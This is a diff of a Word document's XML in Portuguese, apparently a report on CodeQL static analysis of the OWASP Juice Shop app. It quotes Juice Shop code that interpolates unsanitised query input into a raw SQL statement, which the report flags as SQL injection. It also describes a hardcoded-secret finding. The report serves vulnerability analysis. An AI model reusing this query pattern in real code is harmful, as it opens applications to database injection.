-        <w:t xml:space="preserve"> (adquirida mais tarde pelo </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>GitHub</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O CodeQL vê o código a ser analisado como uma base dados, permitindo assim ao utilizador procurar por vulnerabilidade através de </w:t>
+        <w:t xml:space="preserve">CodeQL é uma ferramenta de analise de código. Esta ferramenta permite analisar código com o objetivo de encontrar vulnerabilidades. O CodeQL vê o código a ser analisado como uma base dados, permitindo assim ao utilizador procurar por vulnerabilidade através de </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -4747,7 +5371,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Para tal utilizou-se a QL </w:t>
       </w:r>
       <w:r>
@@ -4957,6 +5580,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -4983,8 +5607,23 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">. É possível observar uma lista onde se encontram identificadas </w:t>
-      </w:r>
+        <w:t>. É possível observar uma lista onde se encontram identificadas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4994,6 +5633,7 @@
         </w:rPr>
         <w:t>hardcoded</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5216,7 +5856,15 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mapeados pelo próprio controlador através de anotações. Este controlador disponibiliza e gere os seguintes </w:t>
+        <w:t xml:space="preserve"> mapeados </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">pelo próprio controlador através de anotações. Este controlador disponibiliza e gere os seguintes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5359,7 +6007,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">utilizada também a </w:t>
+        <w:t xml:space="preserve">utiliza também a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5831,7 +6479,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Se um utilizador malicioso descobrir este segredo (A.4.c), poderá enviar pedidos validos para estes </w:t>
       </w:r>
       <w:r>
@@ -5848,8 +6495,16 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">, fazendo se passar por outros utilizadores e podendo até escalar os seus privilégios. Se este segredo for usado também noutros serviços, mesmo não estando </w:t>
-      </w:r>
+        <w:t xml:space="preserve">, fazendo se passar por outros utilizadores e podendo até escalar os seus privilégios. Se este segredo for usado também noutros serviços, mesmo não </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">se encontrando </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5859,6 +6514,7 @@
         </w:rPr>
         <w:t>hardcoded</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5885,21 +6541,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>B/C</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> – </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>JuiceShop github execution</w:t>
+        <w:t>B/C – JuiceShop github execution</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
     </w:p>
@@ -5927,6 +6569,7 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="360"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -6089,6 +6732,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
@@ -6104,6 +6749,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-BR"/>
@@ -6136,6 +6783,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>CodeQL</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -6150,6 +6798,8 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
@@ -6173,7 +6823,15 @@
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
-        <w:t>O source</w:t>
+        <w:t xml:space="preserve">O </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+        </w:rPr>
+        <w:t>source</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6184,14 +6842,20 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:ind w:firstLine="720"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">let criteria: any = </w:t>
       </w:r>
@@ -6200,6 +6864,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>req.query</w:t>
       </w:r>
@@ -6207,6 +6873,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>.q</w:t>
       </w:r>
@@ -6214,6 +6882,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve"> === 'undefined</w:t>
       </w:r>
@@ -6221,6 +6891,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>' ?</w:t>
       </w:r>
@@ -6228,52 +6900,196 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">'' : </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>req.query.q</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>consome diretamente o criteria através do user input da query e utiliza o mesmo sem qualquer tipo de sanitização através da query de sink que é executada na DB:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>' :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>req.query</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>.q</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">onsome diretamente o </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>criteria</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> através do </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>user input</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> da </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> e utiliza o mesmo sem qualquer tipo de sanitização através da </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>sink</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> que é executada na</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> base de dados</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>models.sequelize</w:t>
       </w:r>
@@ -6281,6 +7097,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>.</w:t>
       </w:r>
@@ -6288,6 +7106,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>query</w:t>
       </w:r>
@@ -6295,6 +7115,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
@@ -6302,6 +7124,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">`SELECT * FROM Products WHERE ((name LIKE '%${criteria}%' OR description LIKE '%${criteria}%') AND </w:t>
       </w:r>
@@ -6309,6 +7133,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>deletedAt</w:t>
       </w:r>
@@ -6316,32 +7142,40 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve"> IS NULL) ORDER BY name`)” </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>permtindo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> assim um malfeitor injetar comandos SQL maliciosos, quer seja para alterar ou extrair informações da DB.</w:t>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Permitindo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> assim um malfeitor injetar comandos SQL maliciosos, quer seja para alterar ou extrair informações da </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>base dados</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6368,35 +7202,34 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Um falso positivo</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ocorre quando uma ferramenta de análise estática indica um problema que não existe, pode acontecer, por exemplo, quando uma validação de código não está a ser corretamente identificada pela ferramenta, exemplo:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Um falso positivo ocorre quando uma ferramenta de análise estática indica um problema que não existe, pode acontecer, por exemplo, quando uma validação de código não está a ser corretamente identificada pela ferramenta, exemplo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>public class Division {</w:t>
       </w:r>
@@ -6405,11 +7238,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">    public static double </w:t>
       </w:r>
@@ -6417,6 +7254,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>divide(</w:t>
       </w:r>
@@ -6424,6 +7263,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t>double a, double b) {</w:t>
       </w:r>
@@ -6432,12 +7273,16 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
@@ -6445,6 +7290,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>if</w:t>
@@ -6453,6 +7300,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> (b == 0) </w:t>
@@ -6461,21 +7310,18 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>{</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>{ /</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve">/ aqui exsite uma </w:t>
@@ -6484,6 +7330,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t>proteção</w:t>
@@ -6492,6 +7340,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
         <w:t xml:space="preserve"> mas não está a ser validada pela ferramenta</w:t>
@@ -6501,27 +7351,55 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">            throw new IllegalArgumentException("Não é possível dividir por zero");</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
